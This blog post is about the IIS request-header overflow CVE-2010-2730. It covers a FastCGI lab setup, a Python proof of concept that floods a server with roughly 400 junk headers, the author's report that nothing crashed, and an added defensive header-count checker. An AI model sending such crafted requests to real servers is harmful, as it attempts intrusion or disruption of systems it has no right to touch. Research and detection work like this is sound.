Saturday, February 28, 2015

CVE-2010-2730: Microsoft IIS Request Header Buffer Overflow Vulnerability

This proof of concept was written from information available on various sites.
Check Point describes the vulnerability as:

"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."

Configuring FastCGI for IIS 7.5
Browse to
    Control Panel -> Programs and Features 
click "Turn Windows features on or off" and follow the path shown below.
Note: I also tried enabling only CGI and unchecking all the other checkboxes given below.

Install the Administrator pack for IIS 7.5. After installing the pack, click Start and type IIS; you will see Internet Information Services (IIS) Manager. Clicking on it takes you to the window below.

Configure FastCGI as shown below

If you feel the configuration didn't go fine, you can configure and verify it using the CLI.
appcmd.exe is found at

If FastCGI installation is successful accessing
should show below page. I created the page phpinfo.php under
make sure the directory has proper permissions.

Proof of Concept

import os, sys
import urllib2

def main(all_args):
    print "in main"
    if len(all_args) != 3:
        print "invalid args"
        print "usage:\n\t%s server_ip_addr http_port"%(all_args[0])
        # stop here: without both arguments the URL below cannot be built
        sys.exit(1)
    headers = {"Host":all_args[1],
                "Accept": "text/html,application/xhtml+xml,application/xml",
                "Accept-Language": "en-us",
                "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
                "Keep-Alive": "115",
                "Connection": "keep-alive"}

    for k,v in headers.items():
        print (k, v)

    #create junk headers
    print "Creating junk Request Headers"
    for i in range(1,400):
        junk_header = "My-Name" + str(i)
        value = "Praveen Darshanam" + str(i)
        headers.update({junk_header: value})

    url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
    #url = "http://" + all_args[1] + "/info.php"
    print "url: " + url
    #data = "From Praveen Darshanam"
    #req = urllib2.Request(url, data, headers)
    req = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(req)
    print "Response Length =" + str(len(response.read()))

if __name__ == "__main__":
    print "sys.argv=" + str(sys.argv)
    main(sys.argv)

./ server_ip_addr http_port
$ ./ 80
sys.argv=['./', '', '80']
in main
('Accept-Language', 'en-us')
('Connection', 'keep-alive')
('Accept', 'text/html,application/xhtml+xml,application/xml')
('Keep-Alive', '115')
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
('Host', '')
Creating junk Request Headers
Response Length =119639

Exploit Traffic

I didn't see any crash after sending multiple fake headers; not sure if I interpreted the vulnerability in the correct manner.
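
Whether or not the target crashes, a request like the one above stands out by its header count, which is the property the advisory text calls out. The following is an added example, not part of the original post: a Python 3 check that counts the headers in a raw HTTP/1.x request and flags it above a limit. The function names, the 100-header limit and the sample requests (built inline, using the documentation address 192.0.2.10) are assumptions made for illustration.

```python
# Added example (not from the original post): flag HTTP requests whose
# header count is abnormal. MAX_HEADERS is an assumed threshold; tune it.
MAX_HEADERS = 100  # assumption, not a value taken from the advisory


def parse_header_names(raw):
    """Return (names, complete) for one raw HTTP/1.x request (bytes).

    complete is False when the blank line ending the header block is
    missing, e.g. a truncated capture; headers seen so far still count.
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    names = []
    for line in head.split(b"\r\n")[1:]:     # [1:] drops the request line
        # Skip empty lines and obs-fold continuations of the previous header.
        if not line or line[:1] in (b" ", b"\t"):
            continue
        name, colon, _value = line.partition(b":")
        if colon:                            # ignore lines with no colon
            names.append(name.strip().lower().decode("latin-1"))
    return names, bool(sep)


def inspect_request(raw, limit=MAX_HEADERS):
    """Summarise header volume and say whether the request exceeds limit."""
    names, complete = parse_header_names(raw)
    return {
        "header_count": len(names),
        "unique_names": len(set(names)),
        "complete": complete,
        "suspicious": len(names) > limit,
    }


def build_sample(extra):
    """Constructed sample: a GET with 6 ordinary headers plus `extra` fillers."""
    base = ["Host: 192.0.2.10", "Accept: text/html", "Accept-Language: en-us",
            "Accept-Charset: utf-8", "Keep-Alive: 115", "Connection: keep-alive"]
    filler = ["X-Filler%d: value%d" % (i, i) for i in range(1, extra + 1)]
    lines = ["GET /phpinfo.php HTTP/1.1"] + base + filler
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


if __name__ == "__main__":
    for label, raw in (("normal", build_sample(0)), ("flood", build_sample(399))):
        print(label, inspect_request(raw))
```

The 399 filler headers match what `range(1,400)` produces in the proof of concept, giving 405 headers in total against 6 for the ordinary request.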